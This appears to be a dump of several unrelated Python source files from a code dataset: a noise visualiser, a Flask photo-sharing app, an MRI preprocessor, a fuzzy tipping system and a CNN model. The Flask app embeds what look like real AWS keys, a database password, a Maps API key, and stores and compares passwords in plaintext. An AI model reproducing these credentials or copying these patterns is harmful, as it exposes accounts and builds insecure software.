_refresh_seed(self):\r\n self._view.draw_seed(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_seed())\r\n\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.config(bg=\"#ffe6f9\")\r\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\r\n root.state('zoomed')\r\n # root.attributes(\"-fullscreen\", True)\r\n app = App(root, w, h)\r\n root.title(\"PerlinNoiseVisualiser\")\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"214067300","text":"# for heroku\nfrom os import environ\nimport os\nimport random\nimport boto3\ns3 = boto3.resource('s3')\n\nimport sqlite3 as lite\nimport sys\nimport datetime\n\nfrom sqlalchemy import *\n\nfrom flask import Flask\nfrom flask import render_template, flash, redirect, request\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import (LoginManager, login_required, \n\t\t\t\t\tlogin_user, logout_user, current_user)\n\napp = Flask(__name__)\n\nWTF_CSRF_ENABLED = True\napp.secret_key='u_can_do_this'\n\nDATABASE_URL= 'postgres://efixxfonhxlizq:lhU545yvD0cnjsU_1cNpexUosI@ec2-54-83-203-50.compute-1.amazonaws.com:5432/d6ab2sm5oatdeb'\n\n\nAWS_BUCKET_NAME = 'exposr-client'\nAWS_KEY_ID = 'AKIAIZMP2MTECH75C74A'\nAWS_SECRET_KEY = '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'\nAWS_BUCKET_NAME = 'memrix1'\nALLOWED_EXTENSIONS = set(['jpg', 'jpeg', 'gif', 'png']) \n\nGMAPS_API_KEY = \"AIzaSyDEgKQ8xiwb_MHBJXT6wL_t2p_mH1REWZ4\"\n\nfrom boto3.session import Session\nimport botocore\nimport botocore.session\n\nsession = Session(aws_access_key_id=AWS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_KEY,\n region_name='us-west-2')\n\ns3 = session.resource('s3')\ns3Client = session.client('s3')\nbucket = s3.Bucket('mybucket')\nexists = True\ntry:\n s3.meta.client.head_bucket(Bucket='mybucket')\n\nexcept botocore.exceptions.ClientError as e:\n # If a client error is thrown, then check that it was a 404 error.\n # If it was a 404 error, then the bucket does not exist.\n error_code = int(e.response['Error']['Code'])\n if error_code == 404:\n exists = False\n\n# for getting image urls\n# session = botocore.session.get_session()\n# client = session.create_client('s3')\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n# IF it's heroku, try will work\ntry:\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URL\n\tdb = SQLAlchemy(app)\n\tSQLALCHEMY_DATABASE_URI = 'HEROKU_POSTGRESQL_GOLD_URL'\n\n# Otherwise use SQLite locally\nexcept KeyError:\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db/info.db'\n\tdb = SQLAlchemy(app)\n\tSQLALCHEMY_DATABASE_URI = 'sqlite:///db/info.db'\n\tprint(\"using sqlite\")\n\nprint( \"success in connect to db \")\n\n# login manager\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(userid):\n return User.query.get(userid)\n\nfrom models import *\nfrom forms import *\nfrom locations import *\n# tree = setup_locations()\n# print(tree)\n\n@app.route('/index', methods=[\"GET\", \"POST\"])\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n\t# render the forms\n\tregister_form= RegisterForm()\n\tlogin_form = LoginForm()\n\n\tif request.method=='POST':\n\t\t# registration\n\t\tif register_form.validate_on_submit():\n\n\t\t\tif len(register_form.password.data) < 8:\n\t\t\t\tflash('Password is not long enough')\n\t\t\t\treturn redirect('/')\n\n\t\t\tprint('register_form validated')\n\n\t\t\t# create a new user object\n\t\t\tuser = User(register_form.username.data, \n\t\t\t\t\t\tregister_form.email.data, \n\t\t\t\t\t\tregister_form.password.data)\n\n\t\t\texisting_user = User.query.filter_by(email=register_form.email.data).first() \n\t\t\tif existing_user:\n\t\t\t\tflash(\"This email has already been registered\")\n\t\t\t\treturn redirect( '/' )\n\n\t\t\texisting_user = User.query.filter_by(username=register_form.username.data).first()\n\t\t\tif existing_user:\n\t\t\t\tflash(\"This username has already been taken\")\n\t\t\t\treturn redirect( '/' )\n\n\t\t\t# add user to db\n\t\t\tdb.session.add(user)\n\t\t\tdb.session.commit()\n\t\t\t# login this new user\n\t\t\tlogin_user(user)\n\t\t\tflash(\"Successfully registered\")\n\t\t\tprint( \"logged in user\" )\n\t\t\treturn redirect('/')\n\n\t\t# logging in form validation\n\t\tif login_form.validate_on_submit():\n\n\t\t\tprint('Attempt login')\n\t\t\t#check for user in db\n\t\t\tuser = User.query.filter_by(email=login_form.email.data).first()\n\t\t\t\n\t\t\t# if the passwords match\n\t\t\tif (user and login_form.password.data == user.password):\n\t\t\t\t\n\t\t\t\t# login the user\n\t\t\t\tlogin_user(user)\n\t\t\t\tprint('logged in user: ')\n\t\t\t\tprint(current_user)\n\t\t\t\tflash(\"Successfully logged in\")\n\t\t\t\treturn redirect('/')\n\n\t\t\t# user is not in our db! turn him baaaakc\n\t\t\telif not user:\n\t\t\t\tflash('Wrong Email/Password Combination')\n\t\t\t\treturn redirect('/index')\n\t\t\n\t\tflash('All fields are required')\n\t\treturn redirect('/index')\n\n\t# Render default un-logged in session\n\tphotos = Photo.query.all()\n\n\tphotos_list = []\n\n\tfor photo in photos:\n\t\t# obj = s3.Object(bucket_name=AWS_BUCKET_NAME, key=photo.aws_key)\n\t\t# response = obj.get()\n\t\t# data = response['Body'].read()\n\n\t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\t\t# print(photo.tags)\n\t\ttags = \" \".join(photo.tags.split(\", \"))\n\t\tprint(tags)\n\t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n\treturn render_template('index.html',\n\t\t\t\t\t\t\ttitle='Hello',\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tphotos=photos_list)\n\n\nclass PhotoObj():\n\n\tdef __init__(self, data, url, tags):\n\t\tself.data = data\n\t\tself.url = url\n\t\tself.tags = tags\n\n\tdef __repr__(self):\n\t\treturn PhotoObj.data.aws_key\n\n# @app.route('/profile', methods=['GET', 'POST'])\n# @login_required\n# def profile():\n\n# \tregister_form = RegisterForm()\n# \tlogin_form = LoginForm()\n# \t# likes = 0\n# \t# aliases = Alias.query.filter_by(user_id=current_user.id)\n# \t# for alias in aliases:\n# \t# \tlikes = likes + alias.points\n\n# \tuser_photos = Photo.query.filter_by(creator_id=current_user.id)\n# \tphotos_list = []\n# \tfor photo in user_photos:\n# \t\t# obj = s3.Object(bucket_name=AWS_BUCKET_NAME, key=photo.aws_key)\n# \t\t# response = obj.get()\n# \t\t# data = response['Body'].read()\n\n# \t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n# \t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n# \treturn render_template( 'profile.html',\n# \t\t\t\t\t\t\t# likes=likes,\n# \t\t\t\t\t\t\ttitle=\"Profile\",\n# \t\t\t\t\t\t\tlogin_form=login_form,\n# \t\t\t\t\t\t\tregister_form=register_form,\n# \t\t\t\t\t\t\tcurrent_user=current_user,\n# \t\t\t\t\t\t\tphotos=photos_list)\n\n@app.route('/community', methods=['GET', 'POST'])\ndef community():\n\n\tregister_form = RegisterForm()\n\tlogin_form = LoginForm()\n\n\tuser_photos = Photo.query.all()\n\tphotos_list = []\n\tfor photo in user_photos:\n\t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\t\ttags = \" \".join(photo.tags.split(\", \"))\t\t\n\t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n\treturn render_template( 'community.html',\n\t\t\t\t\t\t\t# likes=likes,\n\t\t\t\t\t\t\ttitle=\"Community\",\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tphotos=photos_list)\n\n@app.route('/user/')\ndef user(username, methods=['GET', 'POST']):\n\n\tregister_form= RegisterForm()\n\tlogin_form = LoginForm()\n\tuser = User.query.filter_by(username=username).first()\n\n\tif not user:\n\t\tflash(\"User not found\")\n\t\t# temporary redirect to homepage\n\t\treturn redirect('/')\n\n\tuser_photos = Photo.query.filter_by(creator_id=user.id)\n\n\tphotos_list = []\n\n\tfor photo in user_photos:\n\t\t# obj = s3.Object(bucket_name=AWS_BUCKET_NAME, key=photo.aws_key)\n\t\t# response = obj.get()\n\t\t# data = response['Body'].read()\n\n\t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\t\ttags = \" \".join(photo.tags.split(\", \"))\n\t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n\treturn render_template('user.html',\n\t\t\t\t\t\t\ttitle='Hello',\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tuser=user,\n\t\t\t\t\t\t\tphotos=photos_list)\n\n# Generate individual photo pages\n@app.route('/photo/', methods=['GET', 'POST'])\ndef photo(photoname):\n\n\tregister_form= RegisterForm()\n\tlogin_form = LoginForm()\n\tphoto = Photo.query.filter_by(title=photoname).first()\n\tuser = User.query.filter_by(id=photo.creator_id).first()\n\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\n\tif photo:\n\t\treturn render_template( 'photo.html',\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tuser=user,\n\t\t\t\t\t\t\tphoto=photo,\n\t\t\t\t\t\t\turl=url )\n\n\telse:\n\t\tflash('Photo not found')\n\t\treturn render_template( 'index.html' )\n\nphoto_just_added = False\n@app.route('/new', methods=['GET', 'POST'])\n@login_required\ndef new():\n\n\tglobal photo_just_added\n\n\tregister_form = RegisterForm()\n\tlogin_form = LoginForm()\n\tphoto_form = PhotoForm()\n\n\tif request.method == \"POST\":\n\n\t\tif not photo_form.validate_on_submit():\n\t\t\tflash(\"You might be missing some data fields!\")\n\t\t\treturn redirect(\"/new\")\n\n\t\tfile = request.files['file']\n\t\tif file and allowed_file(file.filename):\n\n\t\t\tfilename = file.filename\n\n\t\t\t# Add a random integer to the aws_key in case of multiple same-name uploads\n\t\t\taws_key = filename.split(\".\")[0] + str(random.randint(1, 10000)) + \".\" + filename.split(\".\")[1]\n\n\t\t\twhile Photo.query.filter_by(aws_key=aws_key).first():\n\t\t\t\taws_key = filename.split(\".\")[0] + str(random.randint(1, 10000)) + \".\" + filename.split(\".\")[1]\n\n\t\t\tprint(\"New aws key for this photo: \")\n\t\t\tprint(aws_key)\n\n\t\t\tphoto = Photo(\tcurrent_user,\n\t\t\t\t\t\t\tphoto_form.description.data,\n\t\t\t\t\t\t\tphoto_form.aperture.data,\n\t\t\t\t\t\t\tphoto_form.shutter_speed.data,\n\t\t\t\t\t\t\tphoto_form.focal_length.data,\n\t\t\t\t\t\t\tphoto_form.lens_focal_length.data,\n\t\t\t\t\t\t\tphoto_form.iso.data,\n\t\t\t\t\t\t\tphoto_form.camera_type.data,\n\t\t\t\t\t\t\tphoto_form.mode.data,\n\t\t\t\t\t\t\tphoto_form.title.data,\n\t\t\t\t\t\t\tphoto_form.date.data,\n\t\t\t\t\t\t\tphoto_form.location.data,\n\t\t\t\t\t\t\tphoto_form.tags.data,\n\t\t\t\t\t\t\taws_key \t)\n\n\n\t\t\ts3.Bucket(AWS_BUCKET_NAME).put_object(Key=aws_key, Body=file)\n\n\t\t\tflash(\"File successfully added\")\n\t\t\tprint(\"File successfully uploaded\")\n\n\t\t\tdb.session.add(photo)\n\t\t\tdb.session.commit()\n\n\t\t\tprint(\"Photo obj added to db\")\n\n\t\t\tphoto_just_added = True\n\t\t\treturn redirect('/')\n\n\t\telif not file or not allowed_file(file.filename):\n\t\t\tprint(\"File invalid\")\n\t\t\tflash('File is invalid')\n\n\n\t\tprint(\"Yes\")\n\t\treturn redirect('/')\n\t\t\n\t\tif photo_just_added:\n\t\t\tphoto_just_added = False\n\t\t\treturn redirect('/')\n\n\telse:\n\n\n\t\tif request.args.get('title'):\n\t\t\tprint(\"YES!\")\n\n\n\t\tif photo_just_added:\n\t\t\tphoto_just_added = False\n\t\t\treturn redirect('/')\n\n\t\treturn render_template('new.html', title=\"New\",\n\t\t\t\t\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\t\t\t\t\tphoto_form=photo_form )\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n flash(\"You are now logged out.\")\n return redirect('/')\n \n# deals with unauthorized page access\n@login_manager.unauthorized_handler\ndef unauthorized():\n # do stuff\n flash(\"You'll need to log in or sign up to access this content\")\n return redirect('/')\n\n# transactionUserDict = {}\n\n# @app.route('/vote', methods=['POST'])\n# @login_required\n# def vote():\n# \tif request.method == 'POST':\n# \t\tif request.form['transactionId']:\n# \t\t\ttransactionId = request.form['transactionId']\n# \t\t\tif transactionId not in transactionUserDict:\n# \t\t\t\ttransactionUserDict[transactionId] = []\n# \t\t\tif current_user in transactionUserDict[transactionId]:\n# \t\t\t\treturn 'nah'\n# \t\t\telse:\n# \t\t\t\ttransactionUserDict[transactionId].append(current_user)\n# \t\t\t\tcurrTransaction = Transaction.query.filter_by(id=int(transactionId)).first()\n# \t\t\t\tcurrTransaction.likes += 1\n# \t\t\t\tdb.session.commit()\n# \t\t\t\treturn 'lol nice'","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252692274","text":"# coding: utf-8\n\n# import built-in modules\nimport os,pickle,random,gc\nimport hashlib\nimport traceback\n###########################\n\n# import third parties' modules\nimport tensorlayer as tl\nimport nibabel as nib\nimport numpy as np\n###########################\nimport config\n# import my modules\n\n###########################\nclass DataPreprocessor(object):\n \"\"\"\n DataPreprocessor class.\n @pythonVersion: 3.5.2\n @methods:\n __init__ Initiate data preprocessor instance.\n getAllData Get training data and test data. Define the ratio of training data\n and test data by set 'trainTestRate' parameter and 'dataSize' as size\n of data to use.\n @author: XZ.Liu\n @creation: 2018-03-18\n @modified: 2018-03-20\n @version: 0.1\n \"\"\"\n def __init__(self, imgsPath=config.IMAGE_PATH, segsPath=config.SEGS_PATH, saveDir=config.SAVE_DIR):\n try:\n self.__imgsPath = imgsPath\n self.__segsPath = segsPath\n self.__saveDir = saveDir\n if not os.path.exists(saveDir):\n os.makedirs(saveDir)\n except Exception as why:\n traceback.print_exc(why)\n\n def __checkDim(self,imgData):\n # check the shape of image\n if imgData.shape != (256,256,180):\n x_pad = (256-imgData.shape[0])//2\n y_pad = (256-imgData.shape[1])//2\n z_pad = (180-imgData.shape[2])//2\n imgData = np.pad(imgData, ((x_pad,x_pad),(y_pad,y_pad),(z_pad,z_pad)),'constant',constant_values=((-1,-1),(-1,-1),(-1,-1)))\n return imgData\n def __loadImg(self, left, right):\n \"\"\"\n Load the images' 3D data to a dict classfied by images' different dimensions.\n Returns :list: dataList object\n\n :param left: Left index of __imgsPath's image list to load.\n :param right: Right index of __imgsPath's image list to load.\n \"\"\"\n imgList = os.listdir(self.__imgsPath)[left:right]\n dataList = []\n # load image data by image shape\n for imgName in imgList:\n imgPath = self.__imgsPath + imgName\n img = nib.load(imgPath)\n imgData = img.get_data() #(256, 256, 166, 1)\n # get the first three dimension - 3D data\n imgData = imgData[:,:,:,0]\n imgData = self.__checkDim(imgData)\n # if the list of the specific dimension data already exists, we just append data to it.\n dataList.append(imgData)\n return dataList # shape [(256, 256, 180)]\n\n def __getNormalizeParam(self, dataList):\n \"\"\"\n Get the parameters we need to normalize the images' data.\n Returns :dict: dataMeanStdDict\n\n :param dataList: Data list to use for calculating the normalizing parameters.\n \"\"\"\n dataList = np.asarray(dataList)\n # calculate mean and std\n m = np.mean(dataList)\n s = np.std(dataList)\n dataMeanStdDict = {'mean': 0.0, 'std': 1.0}\n dataMeanStdDict['mean'] = m\n dataMeanStdDict['std'] = s\n return dataMeanStdDict\n\n def __save(self, object, name = 'mean_std_dict.pickle'):\n \"\"\" Save file to pickle. \"\"\"\n with open(self.__saveDir + name, 'wb') as f:\n pickle.dump(object, f, protocol=4)\n\n def __getData(self, imgList, dataMeanStdDict):\n \"\"\"\n Get normalized image data.\n Returns :tuple: X_input,X_target\n\n :param imgList: Image list used to normalize and construct the return tuple.\n :param dataMeanStdDict: Dict of image list's parameters for normalizing.\n \"\"\"\n X_input = []\n X_target = []\n for imgName in imgList:\n imgPath = self.__imgsPath + imgName\n imgData = nib.load(imgPath).get_data()\n imgData = imgData[:, :, :, 0]\n imgData = self.__checkDim(imgData)\n # dimIndex = str(hashlib.md5(str(imgData.shape).encode()).hexdigest())[:6]\n imgData = (imgData - dataMeanStdDict['mean']) / dataMeanStdDict['std']\n imgData = imgData.astype(np.float32)\n\n # default segentation image name is the same as image name\n segName = imgName\n segImgData = nib.load(self.__segsPath + segName).get_data()\n segImgData = segImgData[:,:,:,0]\n segImgData = self.__checkDim(segImgData)\n for j in range(imgData.shape[2]):\n tmpArray = imgData[:, :, j]\n tmpArray.astype(np.float32)\n X_input.append(tmpArray)\n seg2d = segImgData[:, :, j]\n seg2d.astype(int)\n X_target.append(seg2d)\n gc.collect()\n print(\"finished {}\".format(imgName))\n return X_input,X_target\n\n def getAllData(self,trainTestRate = 0.8, dataSize = 'small'):\n \"\"\"\n Get training data and testing data.\n Returns :tuple: X_trainInput,X_trainTarget,X_testInput,X_testTarget\n\n :param trainTestRate: The value of (training data / testing data)\n :param: dataSize: The size of images used. legal values are 'small' 'half' 'all'\n \"\"\"\n try:\n num = len(os.listdir(self.__imgsPath))\n if dataSize == 'small':\n dataSize = num // 10\n elif dataSize == 'half':\n dataSize = num // 2\n elif dataSize == 'all':\n dataSize = num\n else:\n raise ValueError('Illegal dataSize')\n except Exception as e:\n traceback.print_exc()\n finally:\n print('Using data size: {}'.format(dataSize))\n\n try:\n if int(trainTestRate) < 0 or int(trainTestRate) > 1:\n raise ValueError('Error trainTestRate')\n trainIndex = int(dataSize * trainTestRate)\n except ValueError as e:\n traceback.print_exc()\n finally:\n print('train index by {}'.format(trainIndex))\n\n trDataList = self.__loadImg(0, trainIndex)\n txDataList = self.__loadImg(trainIndex, dataSize)\n trDataMeanStdDict = self.__getNormalizeParam(trDataList)\n txDataMeanStdDict = self.__getNormalizeParam(txDataList)\n # self.__save(trDataMeanStdDict, name = 'tr_mean_std_dict.pickle')\n # self.__save(txDataMeanStdDict, name = 'tx_mean_std_dict.pickle')\n\n try:\n segList = os.listdir(self.__segsPath)[:dataSize - 1]\n imgList = os.listdir(self.__imgsPath)[:dataSize - 1]\n trImgList = imgList[:trainIndex]\n txImgList = imgList[trainIndex:]\n trSegList = segList[:trainIndex]\n txSegList = segList[trainIndex:]\n except Exception as e:\n traceback.print_exc()\n\n print('Getting training data...')\n X_trainInput,X_trainTarget = self.__getData(trImgList, trDataMeanStdDict)\n print('Getting testing data...')\n X_testInput,X_testTarget = self.__getData(txImgList, txDataMeanStdDict)\n\n # for i in X_trainInput:\n # print(i.shape)\n X_trainInput = np.asarray(X_trainInput, dtype='float32')\n X_trainTarget = np.asarray(X_trainTarget, dtype='float32')\n X_testInput = np.asarray(X_testInput)\n X_testTarget = np.asarray(X_testTarget)\n # print(X_trainInput.shape)\n # print(X_trainTarget.shape)\n # print(X_testInput.shape)\n # print(X_testTarget.shape)\n return X_trainInput,X_trainTarget,X_testInput,X_testTarget\n\nif __name__ == '__main__':\n print('import me plz :)')\n","sub_path":"DataFactory.py","file_name":"DataFactory.py","file_ext":"py","file_size_in_byte":7564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191692318","text":"import numpy as np\nfrom skfuzzy import control as ctrl\nfrom skfuzzy import membership as mf\nimport matplotlib.pyplot as plt\n\nservice = ctrl.Antecedent(np.arange(0, 11, 1), 'service')\nfood = ctrl.Antecedent(np.arange(0, 11, 1), 'food')\ntips = ctrl.Consequent(np.arange(0, 31, 1), 'tips')\n\n# service['poor'] = mf.trimf(service.universe, [0, 0, 5])\n# service['average'] = mf.trimf(service.universe, [0, 5, 10])\n# service['good'] = mf.trimf(service.universe, [5, 10, 10])\nservice['poor'] = mf.trimf(service.universe, [0, 0, 3])\nservice['average'] = mf.trimf(service.universe, [2, 5, 8])\nservice['good'] = mf.trimf(service.universe, [6, 10, 10])\n\nfood['poor'] = mf.trimf(food.universe, [0, 0, 5])\nfood['average'] = mf.trimf(food.universe, [0, 5, 10])\nfood['good'] = mf.trimf(food.universe, [5, 10, 10])\n\ntips['low'] = mf.trimf(tips.universe, [0, 0, 15])\ntips['medium'] = mf.trimf(tips.universe, [0, 15, 30])\ntips['high'] = mf.trimf(tips.universe, [15, 30, 30])\n\nrule1 = ctrl.Rule(service['poor'] & food['poor'], tips['low'])\nrule2 = ctrl.Rule(service['poor'] & food['average'], tips['low'])\nrule3 = ctrl.Rule(service['poor'] & food['good'], tips['medium'])\nrule4 = ctrl.Rule(service['average'] & food['poor'], tips['low'])\nrule5 = ctrl.Rule(service['average'] & food['average'], tips['medium'])\nrule6 = ctrl.Rule(service['average'] & food['good'], tips['high'])\nrule7 = ctrl.Rule(service['good'] & food['poor'], tips['medium'])\nrule8 = ctrl.Rule(service['good'] & food['average'], tips['high'])\nrule9 = ctrl.Rule(service['good'] & food['good'], tips['high'])\n\nrules = [rule1, rule2, rule3, rule4, rule5, rule6, rule7, rule8, rule9]\n\ntip_rec_ctrl = ctrl.ControlSystem(rules=rules)\n\ntip_rec = ctrl.ControlSystemSimulation(control_system=tip_rec_ctrl)\n\n# define the values for the inputs\ntip_rec.input['service'] = 4\ntip_rec.input['food'] = 9\n\n# compute the outputs\ntip_rec.compute()\n\n# print the output values\nprint(tip_rec.output)\n\n# to extract one of the outputs\nprint(tip_rec.output['tips'])\n\ntips.view(sim=tip_rec)\n\n# Plot\nplt.show()","sub_path":"Lab_07-Fuzzy_Logic/17032467_tipping_system.py","file_name":"17032467_tipping_system.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624669524","text":"\"\"\"\nCreated by Joakim Sorensen\n2017008298\nMachine Learning 2017\nKyung Hee University\n\n\"\"\"\n\nimport tensorflow as tf\nfrom sklearn import metrics\n\n\"\"\"\nThe model for the CNN, built with tensorflow.\nCan be trained and tested with functions defined\nbelow.\n\"\"\"\nclass Model:\n\n\n\tdef __init__(self, sess, name, nb_classes):\n\t\tself.name = name\n\t\tself.sess = sess\n\t\tself.nb_classes = nb_classes\n\t\tself._build_net()\n\n\t\"\"\"\n\tBuilds the CNN according to the img_size.\n\tNew image size will need new values for the layers,\n\tchanging just the image size will return in exceptions.\n\t\"\"\"\n\tdef _build_net(self):\n\t\twith tf.variable_scope(self.name):\n\t\t\timg_size = 45 * 45 * 1\n\n\t\t\tself.X = tf.placeholder(tf.float32, [None, img_size])\n\t\t\tself.Y = tf.placeholder(tf.float32, [None, self.nb_classes])\n\n\t\t\t# define layers\n\t\t\tinput_layer = tf.reshape(self.X, [-1, 45, 45, 1])\n\t\t\twith tf.variable_scope('conv_pool_1'):\n\n\t\t\t\tconv1 = tf.layers.conv2d(inputs=input_layer, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfilters=81, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkernel_size=[5, 5], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding='same', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivation=tf.nn.relu)\n\n\t\t\t\tpool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[3, 3], strides=3)\n\n\t\t\t\ttf.summary.image('input1', input_layer, 3)\n\t\t\t\ttf.summary.histogram('conv1', conv1)\n\t\t\t\ttf.summary.histogram('pool1', pool1)\n\t\t\t\n\t\t\twith tf.variable_scope('conv_pool_2'):\n\t\t\t\tconv2 = tf.layers.conv2d(inputs=pool1, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfilters=162, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkernel_size=[5, 5], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding='same', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivation=tf.nn.relu)\n\n\t\t\t\tpool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[3, 3], strides=3)\n\t\t\t\t\n\t\t\t\t#tf.summary.image('input2', pool1, 3)\n\t\t\t\ttf.summary.histogram('conv2', conv2)\n\t\t\t\ttf.summary.histogram('pool2', pool2)\n\n\t\t\twith tf.variable_scope('conv_pool_3'):\n\t\t\t\tconv3 = tf.layers.conv2d(inputs=pool2, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfilters=243, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkernel_size=[5, 5], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding='same', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivation=tf.nn.relu)\n\n\t\t\t\tpool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[5, 5], strides=5)\n\n\t\t\t\t#tf.summary.image('input3', pool2, 3)\n\t\t\t\ttf.summary.histogram('conv3', conv3)\n\t\t\t\ttf.summary.histogram('pool3', pool3)\n\n\t\t\twith tf.variable_scope('dense'):\n\t\t\t\t#pool2_flat = tf.reshape(pool2, [-1, 5 * 5 * 162])\n\t\t\t\tpool2_flat = tf.reshape(pool3, [-1, 1 * 1 * 243])\n\n\t\t\t\tdense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n\t\t\t\tdropout = tf.layers.dropout(inputs=dense, rate=0.4, training=True)\n\n\t\t\t\tlogits = tf.layers.dense(inputs=dropout, units=self.nb_classes)\n\t\t\t\t\n\t\t\t\t#tf.summary.image('input4', pool3, 3)\n\t\t\t\ttf.summary.histogram('pool2_flat', pool2_flat)\n\t\t\t\ttf.summary.histogram('dense', dense)\n\t\t\t\ttf.summary.histogram('dropout', dropout)\n\t\t\t\ttf.summary.histogram('logits', logits)\n\n\t\t\twith tf.variable_scope('predictions'):\n\t\t\t# predictions\n\t\t\t\tclasses = tf.argmax(input=logits, axis=1)\n\t\t\t\tself.probabilities = tf.nn.softmax(logits, name='softmax_tensor')\n\t\t\t\ttf.summary.histogram('classes', classes)\n\t\t\t\ttf.summary.histogram('probabilities', self.probabilities)\n\n\t\t\tself.loss = tf.losses.softmax_cross_entropy(onehot_labels=self.Y, logits=logits)\n\t\t\tself.optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(self.loss)\n\n\t\t\tis_correct = tf.equal(tf.argmax(self.probabilities, 1), tf.argmax(self.Y, 1))\n\t\t\tself.accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n\t\t\t#confusion_matrix(tf.argmax(self.probabilities, 1), tf.argmax(self.Y, 1))\t\n\t\t\tpredicted = tf.argmax(self.probabilities, 1)\n\t\t\ttrue = tf.argmax(self.Y, 1)\n\t\t\ttp = tf.count_nonzero(predicted * true, dtype=tf.float32)\n\t\t\tfp = tf.count_nonzero(predicted * (true - 1), dtype=tf.float32)\n\t\t\tself.precision = tf.divide(tp, tp + fp)\n\t\t\t\n\t\t\tcost_summ = tf.summary.scalar('loss', self.loss)\n\t\t\tacc_summ = tf.summary.scalar('accuracy', self.accuracy)\n\t\t\tprec_summ = tf.summary.scalar('precision', self.precision)\n\n\t\t\tself.summary = tf.summary.merge_all()\n\n\t\"\"\"\n\tTrain the model with given datasets.\n\tx_data: a tensorflow vector with image data\n\ty_data: a one hot encoded tensorflow vector for labels\n\treturns loss and optimizer output\n\t\"\"\"\n\tdef train(self, x_data, y_data):\n\t\treturn self.sess.run([self.summary, self.loss, self.optimizer], \n\t\t\t\t\t\tfeed_dict = {self.X: x_data, self.Y: y_data})\t\n\n\t\"\"\"\n\tPredict the labels for given data.\n\tx_test: a tensorflow vector with image data\n\treturns index of predicted label\n\t\"\"\"\n\tdef predict(self, x_test):\n\t\treturn self.sess.run(tf.argmax(self.probabilities, 1), \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeed_dict={self.X: x_test})[0]\n\t\"\"\"\n\tReturns the labels as a string.\n\ty_data: one hot encoded tensorflow vector\n\treturns corresponding string label\n\t\"\"\"\n\tdef get_label(self, y_data):\n\t\treturn self.sess.run(tf.argmax(y_data, 1))[0]\t\n\n\t\"\"\"\n\tReturns the accuracy of the model with\n\tgiven test data.\n\tx_test: a tensorflow vector with image data\n\ty_test: the correct labels as one hot 